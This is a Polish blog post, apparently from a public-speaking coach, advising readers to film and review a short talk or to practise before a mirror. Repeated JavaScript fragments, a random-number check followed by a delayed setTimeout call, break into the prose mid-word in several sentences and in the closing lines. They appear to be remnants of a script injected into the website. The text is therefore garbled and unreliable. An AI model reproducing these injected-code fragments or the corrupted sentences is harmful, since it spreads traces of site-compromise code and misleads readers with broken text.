Za 58 minut będziesz lepszym mówcą!

Dziś mam dla Ciebie pomysł w jaki sposób natychmiast poprawić swoje umiejętności występowania przed publicznością. Nie wierzysz? Obejrzyj film i… działaj!

Jeśli nie podoba Ci się moja czapka albo nie masz 3 minut na obejrzenie filmu możesz przeczytać transkrypt tego nagrania:

Aby szybko wprowadzić nową jakość do Twoich prezentacji potrzebne Ci będą dwie rzeczy:
1. telefon komórkowy z możliwością nagrywania filmów (nie musi być super jakość HD)
2. odwaga (ponieważ musisz mieć odwagę aby obejrzeć swój występ zarejestrowany na komórce – najczęściej nie lubimy oglądać filmów z naszym udziałem, prawda? A tu na dodatek mamy główną rolę!)

Poproś kogoś z rodziny lub znajomego aby sfilmował Twoją krótką prezentację. Możesz powiedzieć coś o sobie, o swojej pracy lub o tym co lubisz robić, może przemawiać??? 🙂
Następnie obejrzyj film. Co zyskasz oglądając nagranie? Masz możliwość zaobserwowania tego jak się zachowujesz, jak gestykulujesz, jak mówisz. Może okazać się, że masz jakiś nerwowy tik, z którego wcześniej nie zdawałaś/łeś sobie sprawy? Albo nadmiernie częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to używasz jakieś słowo albo mówisz eee, yyy?

Zapytaj, także Twojego “kamerzystę” co myśli o Twoim wystąpieniu, co się podobało a co drażniło. Na pewno dowiesz się czegoś ciekawego. Co dalej?

Po obejrzeniu filmu, wynotuj swoje błędy i wygłoś ponownie prezentację starając się wprowadzić korekty. Nie musisz od razu poprawić wszystkiego. Skoncentruj się na jednej, dwóch rzeczach.

Zapewniam Cię, że drugie wystąpienie będzie zdecydowanie lepsze od pierwszego. Zatem nasz cel został osiągnięty – w krótkim czasie staniesz się lepszym mówcą. Wystarczy niecała godzina! Oczywiście pracuj dalej nad udoskonaleniem swojego warsztatu mówcy ale pierwszy krok już wykonany!

Innym pomysłem na pracę nad swoim sposobem mówienia dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to występowanie przed lustrem (jeśli nie masz kamery lub telefonu z opcją nagrywania)
W tym przypadku mam jedna uwagę – Mówiąc przed lustrem możesz byc lekko rozproszony. Od razu możesz zaobserwować co jest nie tak. Nie próbuj jednak od razu wprowadzać korekt. Skończ prezentację. zanotuj błędy i dopiero za drugim podejściem popraw dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to co Ci się nie podobało.

Na zakończenie muszę się wytłumaczyć skąd w tytule 58 minut.
Po pierwsze, jak widzisz na poprawę swojego warsztatu mówcy, wystarczy Ci godzina.
Po drugie, tytuł “Za 58 minut będziesz lepszym mówcą” wydawał mi się lepszy marketingowo od “Za godzinę będziesz lepszym mówcą” 🙂

Tradycyjnie mam do Ciebie prośbę: jeśli film Ci się spodobał, kliknij w “Lubię dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”. Możesz zostawić również swój komentarz pod tym artykułem. Odpowiadam na wszystkie wpisy moich czytelników. Po prostu dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to uwielbiam!

pozdrawiam

.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

15 komentarzy

Leave a Reply